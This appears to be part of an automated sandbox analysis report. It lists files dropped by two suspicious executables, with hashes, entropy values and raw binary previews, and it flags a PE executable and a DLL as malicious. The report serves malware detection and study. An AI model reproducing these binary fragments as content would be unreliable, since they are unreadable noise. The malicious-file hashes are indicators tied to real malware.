                                                                                                                                                    Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111....1 zv.vvvvvvvYIIIvg%&A&&&&&&&NRRV%lyy..KLb#??.\Q.zs|u.....ali....y$ie.J#*g...4pj}}}}}}}}}}}}}}}}}}}}}}}}}}}}}....~7""LO..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxx..JMc">>.]P.{r}t..../`mh....x%hd.K"+f...7si~~~~~~~~~~~~~~~~~~~~~~~~~~~~~....}4!!OL..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&GGGG&&&&GGGG&&&&GGGG&&&i...iiiiiiiiiiiiiiiiiiiii19:9uv~.s{{.....................................~zvp.^..y.......................................jvks..].u......................................
                                                                                                                                                    Process:C:\Users\user\Documents\J8daaU.exe
                                                                                                                                                    File Type:PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):151485
                                                                                                                                                    Entropy (8bit):7.993623090708041
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:AeomT3HgigpWkXL1vWq2p5eMjnun5ebTv0uxgOn2nJCPuWcA3/OhJR:b3X2W81vWBeMjnunIVxgOn2nJ2yr
                                                                                                                                                    MD5:0601876CCE2C3A9A699C096A1B9799E1
                                                                                                                                                    SHA1:C39CD27311668872BC45AA121856F7F373833933
                                                                                                                                                    SHA-256:AE189BAF29687F87ED89507D3901D15020B688683ADABA04625D459363DABC19
                                                                                                                                                    SHA-512:97E803D6CC8E62353B81CDDFC1948246BEE7577169421BBF598B8DC49B538F1341F80A797270A943E7E36C79CED77769688A752E5C9F2195D744509E04BA5874
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):140941
                                                                                                                                                    Entropy (8bit):7.995709860892507
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:QdhlD+ea4Anlrl3/af3xh/I7XsYPv0X7ByK4K9TLPMIldjKBDOe:Qdee2lVAFcfPOAzKdPLdIH
                                                                                                                                                    MD5:7AF26B296715B679817DB8F2BC81CF61
                                                                                                                                                    SHA1:4CCD796003847E5D0E08B1467799E65350A5957B
                                                                                                                                                    SHA-256:EC5AAFAE259A514340C65BD581E5C5D14CC7CA56E639223A7FC871AC12257928
                                                                                                                                                    SHA-512:173C60013923CB26A0BE8C2452E2FB9116B11AAAED6B65E1B95ABD4321D86E2B9D67C777FE34B663CDF713D4CA3C235BFF747DBA731A2C58004C469DD5A1DC68
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):28272
                                                                                                                                                    Entropy (8bit):7.711603797274546
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:9kegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQU:v5F1FUdy422IK+gAZt2i0YPpQn4GMv
                                                                                                                                                    MD5:74BBE19E57936611711E761AC6CEEF29
                                                                                                                                                    SHA1:1911402D0CC517CF83966C584C90D64CE84A0B7A
                                                                                                                                                    SHA-256:89A04F442959A14B71C4DBC922214D33D57BD37D98F1C97DF4997181EA10379F
                                                                                                                                                    SHA-512:BD512F3E58714FEF5E977214CE8307CD58BB8602DFC2D4EF4C3B7E7BB28EB61B1DCBB276C2DDC684522EA6EDF60CB00D0A06A58540D8F5C885DE8BF6D6B92508
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):10515
                                                                                                                                                    Entropy (8bit):7.824657644789603
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:PAotzSPrnRwz1kF69bButXBo+EROXPx3DWvuBQDRKe63WUxZjp3527L:P7tWPNw2FQbButSYxWvjRh63Wu35SL
                                                                                                                                                    MD5:0035DC4371138478A84E3BAA8454C764
                                                                                                                                                    SHA1:830A650F59A640386681E7D3ECD4F4D51756C4A2
                                                                                                                                                    SHA-256:692721CF30588CF416B2E5C251D7070DC3C92E664EF47B7F3300187CF982EA8E
                                                                                                                                                    SHA-512:7A63422BFFDDE835933146A85B03C20598A5A980394D7A7C32C7C92C7DBE81719A2057AC5A9419258CAAAA58D83C7E0DC34D989C387A19C9CFDB8D1A246991E7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1
                                                                                                                                                    Process:C:\Users\user\Documents\J8daaU.exe
                                                                                                                                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):35146
                                                                                                                                                    Entropy (8bit):7.986608104722799
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:j4rkDlmmWL8EH2Ao3F932Lj/403oCBEkFtVYIAO3jk8AyWCbN3pD2nCg2lA:jTDFM8y2ART4etPVA8A9ovD4R2C
                                                                                                                                                    MD5:F050E485170B3ED2DB0C8262CB090CD0
                                                                                                                                                    SHA1:B11C5D85400EFD3464E850AC8E0A8BD280BA2798
                                                                                                                                                    SHA-256:5F1E6D40ADD0C324C67C384D593CAB15223A5D2F468D063A5ED7C736170B0E3A
                                                                                                                                                    SHA-512:48C1A3794D80A0E7E7F3BA0F0B43354505A102415F918EE90640649AFCBFE1691A3245703633147080F542B008DF29744621F544A38DEFD94E12E2A60FB228DB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx..}.UU..... ...."..*!.......!YFD.HHhD.F.DD&"......".....0...>..0.0..s...~g..;..s....0...;.....#.rg..Zg.....O...|B..=.. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. .........w....WA..5.G.>+0...._;]9....TN...j.;.5.m)..x....Qw.:..."....@j.....s..Y1ujZ..v.n..H.uKv..1...e.x,..FoK...-wl.....3!.h....3..T.....".....`s...k...T..'...|bnL.Y.V9x{..{f.......e.m...>..%.....@LQ. <e.._..X_Z......7.....s..=R....#..(....n...+|U....mv...3[..7...Tj...y...1......p...Fl..$....cg..am....+{)...'{...t..d...I.h..w.c:..1._?P.R^..n....M>\<....T......e.......n.S..i.<.t........x..-.......9..n..$.....V<.9y.8W$a|6>g...x....A7..6...~x_.Z..\.L...]......9...n..."...o...'.0...`5...+X...;.....&*A.....^d.`.t..`tR.j..D9..9..:.|..X........C(. ..sA...V.._3....q>[.~~p.{.........\..:b....n...i..g....'....A7.JP.#y...v..../..n...=U1.........../..n..@....:..3I.F&t...t.......AG.... ..^..y.
                                                                                                                                                    Process:C:\Users\user\Documents\J8daaU.exe
                                                                                                                                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):35146
                                                                                                                                                    Entropy (8bit):7.986608104722799
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:j4rkDlmmWL8EH2Ao3F932Lj/403oCBEkFtVYIAO3jk8AyWCbN3pD2nCg2lA:jTDFM8y2ART4etPVA8A9ovD4R2C
                                                                                                                                                    MD5:F050E485170B3ED2DB0C8262CB090CD0
                                                                                                                                                    SHA1:B11C5D85400EFD3464E850AC8E0A8BD280BA2798
                                                                                                                                                    SHA-256:5F1E6D40ADD0C324C67C384D593CAB15223A5D2F468D063A5ED7C736170B0E3A
                                                                                                                                                    SHA-512:48C1A3794D80A0E7E7F3BA0F0B43354505A102415F918EE90640649AFCBFE1691A3245703633147080F542B008DF29744621F544A38DEFD94E12E2A60FB228DB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx..}.UU..... ...."..*!.......!YFD.HHhD.F.DD&"......".....0...>..0.0..s...~g..;..s....0...;.....#.rg..Zg.....O...|B..=.. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. .........w....WA..5.G.>+0...._;]9....TN...j.;.5.m)..x....Qw.:..."....@j.....s..Y1ujZ..v.n..H.uKv..1...e.x,..FoK...-wl.....3!.h....3..T.....".....`s...k...T..'...|bnL.Y.V9x{..{f.......e.m...>..%.....@LQ. <e.._..X_Z......7.....s..=R....#..(....n...+|U....mv...3[..7...Tj...y...1......p...Fl..$....cg..am....+{)...'{...t..d...I.h..w.c:..1._?P.R^..n....M>\<....T......e.......n.S..i.<.t........x..-.......9..n..$.....V<.9y.8W$a|6>g...x....A7..6...~x_.Z..\.L...]......9...n..."...o...'.0...`5...+X...;.....&*A.....^d.`.t..`tR.j..D9..9..:.|..X........C(. ..sA...V.._3....q>[.~~p.{.........\..:b....n...i..g....'....A7.JP.#y...v..../..n...=U1.........../..n..@....:..3I.F&t...t.......AG.... ..^..y.
                                                                                                                                                    Process:C:\Users\user\Documents\J8daaU.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):879
                                                                                                                                                    Entropy (8bit):4.688974052882154
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:JRSJwHmHIJRIK4EgY+ZcRC62fmL874S9a6QT7LoV5yEha:fSJGmKIigY+ZcRufmA7VEVEI
                                                                                                                                                    MD5:C345BADB7A3E3F956477B7945E4BE434
                                                                                                                                                    SHA1:CE2EECFF4EAC735F38F82C6FB72A43D1B482839F
                                                                                                                                                    SHA-256:B3CB5CF15F06434BB8F2C2FBDC1B86C8C057721198949928030E380AC6ED75BF
                                                                                                                                                    SHA-512:5729CA585AE10421852D5C91095AA5528AD6DBB2598DAEC7972B86D557DC78D753DC103FB2C3613B9F29DDCED938B9A157CBCD101E0DA63A420B9C63285975CD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111....1 zv.vvvvvvvYIIIvg%&A&&&&&&&NRRV%lyy..KLb#??.\Q.zs|u.....ali....y$ie.J#*g...4pj}}}}}}}}}}}}}}}}}}}}}}}}}}}}}....~7""LO..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxx..JMc">>.]P.{r}t..../`mh....x%hd.K"+f...7si~~~~~~~~~~~~~~~~~~~~~~~~~~~~~....}4!!OL..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&GGGG&&&&GGGG&&&&GGGG&&&i...iiiiiiiiiiiiiiiiiiiii19:9uv~.s{{.....................................~zvp.^..y.......................................jvks..].u......................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):512
                                                                                                                                                    Entropy (8bit):5.337586101070387
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:WWczhuy0EZjCrCa2BIDROsZo4iXu607OdUzWFR960qOTGD:YwMBIDROsW4auVgUzWF7qHD
                                                                                                                                                    MD5:EE43ABB08EB419A35FF870C5155DDB2E
                                                                                                                                                    SHA1:4CD61078042E2DF18B31AF9F0CA28FBC856EC9F5
                                                                                                                                                    SHA-256:8A0D8CF66B400E75FBDE60177084F88F1CDADDA77B213269938DEF97FE63179D
                                                                                                                                                    SHA-512:2CA8FD8AF7027563F8A8D4404A7B23D0CCB3A6E47DB1625FB2B5DDEEEE628527BA30B7C77AC1E465E4FAA3F414770D2871B0C8C57208FC408F0C71DBEB561AA3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:....l%00HX.V0&x9JJ.Z4w8?VUVQ6.0=TDHS0 }0_].Q.68777777777777777777777777777777777_CCG4}hh..\.h~ a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33K[.U3%{:II.Y7t;<UVUR5|3>WGKP3#~3\^.P~79666666666666666666666666666666666^BBF5|ii..].i.!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111Te^Z?4t>RR>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>N[LX1v<:::::::::::::::::::::::::::::::::::::::::Y[YR7|63G333333333333333333333333333333333333333
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):138776
                                                                                                                                                    Entropy (8bit):6.299362950486936
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:pIVf39AtRKuZkCi0UqcrkXuZ4Q4C0SgWQVUN9Lf9ct7mDRbPC:pIVGKuZ1vgrauUCjN5f9nlC
                                                                                                                                                    MD5:DF76205EAF175184567FC44A83019B20
                                                                                                                                                    SHA1:44F219ECFFF27BF81DCCEE076583D32CE5BF82BD
                                                                                                                                                    SHA-256:A6123E13E12A1A1D4C4A4EB034769BFE8E229C3A9877E0DD173B422E700A26AC
                                                                                                                                                    SHA-512:0C50564629B28D32E5EC74C4B76FBD2C79376838FF6B60DB92403E164BF7CDEECC7FD2A922C64356322C5150792CCD657EED0CB6D974E82682EFF5B6BB640E6A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w................................................S...............=...S......S...........S......Rich............................PE..d......f..........".................t-.........@.............................0............`..............................................................................L... ..d.......p...............................8...............X............................text...0........................... ..`.rdata..............................@..@.data...8...........................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..d.... ......................@..B................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3961669
                                                                                                                                                    Entropy (8bit):7.999921049520985
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:98304:wLfESZqX9Gx2pXp60/aZqHIu0nnHmrHHg:wLfLZqX4x2pXM0IAIu4HmrHA
                                                                                                                                                    MD5:9C91C37AC4B0188DEAC34D680091A81B
                                                                                                                                                    SHA1:3C82F7917187638EC5D4B2565CD65AFBA14BD4C2
                                                                                                                                                    SHA-256:6B75C562EDB832E3BB1A5C4C4847ED3C560A7A3BEF1EB652D27A70A0C033B62A
                                                                                                                                                    SHA-512:1FACD74C850B26993AEC26EE074D3E8735386A3994BF9D761E84E9AFD2DD9F04A38466B8FA958124BD9841ABFD729C4FE87FA458641FF20D8FC773F555DD59FD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx..}.UU..... ...."..*!.......!YFD.HHhD.F.DD&"......".....0...>..0.0..s...~g..;..s....0...;.....#.rg..Zg.....O...|B..=.. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. .........w....WA..5.G.>+....._;]9....TN...j.;.5.m)..x....Qw.:..."....@j.....s..Y1ujZ..v.n..H.uKv..1...e.x,..FoK...-wl.....3!.h....3..T.....".....`s...k...T..'...|bnL.Y.V9x{..{f.......e.m...>..%.....@LQ. <e.._..X_Z......7.....s..=R....#..(....n...+|U....mv...3[..7...Tj...y...1......p...Fl..$....cg..am....+{)...'{...t..d...I.h..w.c:..1._?P.R^..n....M>\<....T......e.......n.S..i.<.t........x..-.......9..n..$.....V<.9y.8W$a|6>g...x....A7..6...~x_.Z..\.L...]......9...n..."...o...'.0...`5...+X...;.....&*A.....^d.`.t..`tR.j..D9..9..:.|..X........C(. ..sA...V.._3....q>[.~~p.{.........\..:b....n...i..g....'....A7.JP.#y...v..../..n...=U1.........../..n..@....:..3I.F&t...t.......AG.... ..^..y.
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3677216
                                                                                                                                                    Entropy (8bit):7.965644371578814
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:98304:IPoIOw5/XsBczXPm7iTUlNw2kGiVDFnkyej4MWD:woe/cBcmlNLkGOFzekf
                                                                                                                                                    MD5:348927A4F5D1E0D01EF02FC91D3F1885
                                                                                                                                                    SHA1:4FCE3128E844ACCC33AC042FAFA7303D5C85CE8E
                                                                                                                                                    SHA-256:44EAE353E7AF24CE43E7308F0B56ED2839E049B874C7272A4E8A70A3255C6625
                                                                                                                                                    SHA-512:5BAC3F0E3DC346481101C84BE73CED832D1E706828D871CCB4C720C29D2D225502911A2D8E4B916C84C24A182A214EF3E65EEB295DAA9E149FEE6B264FEA85D2
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....g.........." ...)............J.L.......................................Z...........`.........................................@.N.L.....H.P.....Z.a.....Y..;............Y.4...................................@.Y.@.............!.X............................text...@........................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.QO ....H........................... ..`.h1c....h.....!.....................@....{,3......7...!...7.................`..h.reloc..4.....Y.......8.............@..@.rsrc...a.....Z.......8.............@..@........................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:SQLite 3.x database, user version 1, last written using SQLite version 3043002, writer version 2, read version 2, file counter 33, database pages 224, 1st free page 36, free pages 219, cookie 0x4, schema 4, UTF-16 little endian, version-valid-for 33
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8350
                                                                                                                                                    Entropy (8bit):7.9657321435710875
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:NB+jaaYI8zd2LSUtOd+s/e+8opeEWonaK3EIOJjBF+J:NB++9aQdgoIIa5IOR8
                                                                                                                                                    MD5:BA8B5CE9F36A17BF2325AF18AFEA5177
                                                                                                                                                    SHA1:9F237C5D9FB6B2EB20226EB6C4B4C707A55F9024
                                                                                                                                                    SHA-256:A35B356F4A0A0717B57FF8665EBDD5B0A0F4F67096A4342E645AAEFB2D5C4B71
                                                                                                                                                    SHA-512:41C5D86AE8CD2118B9EBD6A69DAEB34BCD5B8D1B4BDE41D8643C7891E2B58052B39D5356B362FD9FE9D9B28C2414F6CCE43B1DBE677A20E8708D825788ED18D0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ...!.......$...........................................................!..n.......N..}...7.N...=.!so'.g..}_.S>Q..{.N.c....;G_fx5.#DO..g..}A....l=.2......'o...!.....e.&...o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|m....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1.."...`.,...~....)w.5E 1.V...0DA..~d..........<....> {......I..*.()G...9.#.h.7..*.=......!...s..X2.].+.c.o|.L.U....p...8M+k.......g.....Z..-<..w..tHW...W......l.....wU........p.Z.N..%..v.....h(...Y....Z....0t${.s....s..k.l/.U.U.`D....S5x.V'{..7.+.0[.V..;#.lyt'RI.....|f..Y.M1.r.w..v.............E......]<X....M..q.....t..F.i5...`...Y^..O6....A2.R.3!b...`...G`.81.M^T.{......o.S.... ...q..e..6..z.......-...F....:.&.......@.1....bI8..o.b.Cr..A...../..\.,,z@.....UX..9....T..,.f.bL...S........T........g.....
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:JSON data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):55
                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):7388
                                                                                                                                                    Entropy (8bit):3.2406172262721733
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:cEi+AAsoJjykzEJ+AAsoJjykHEW+AAsoJjykA:cN+SoJbO+SoJvx+SoJI
                                                                                                                                                    MD5:A8CA831C38C32E986F27F7D6C3EF1E02
                                                                                                                                                    SHA1:CA17C0949E577EE8E9E7E9C776DAB705DD2D0FC1
                                                                                                                                                    SHA-256:918701D1D00F2B8DB94ADD3158130733B2EFFD03B6A7B66071FFD82536C5245A
                                                                                                                                                    SHA-512:6645AC6A151D4F7E128D3E6F60B51EE218D6A3D3FF9F1C9E20ACD72F3363111E7DCA457FDB66E1D7E62A897F4BC0AE6F5F968C5E9CF620E6F5F901AE4DE5A236
                                                                                                                                                    Malicious:false
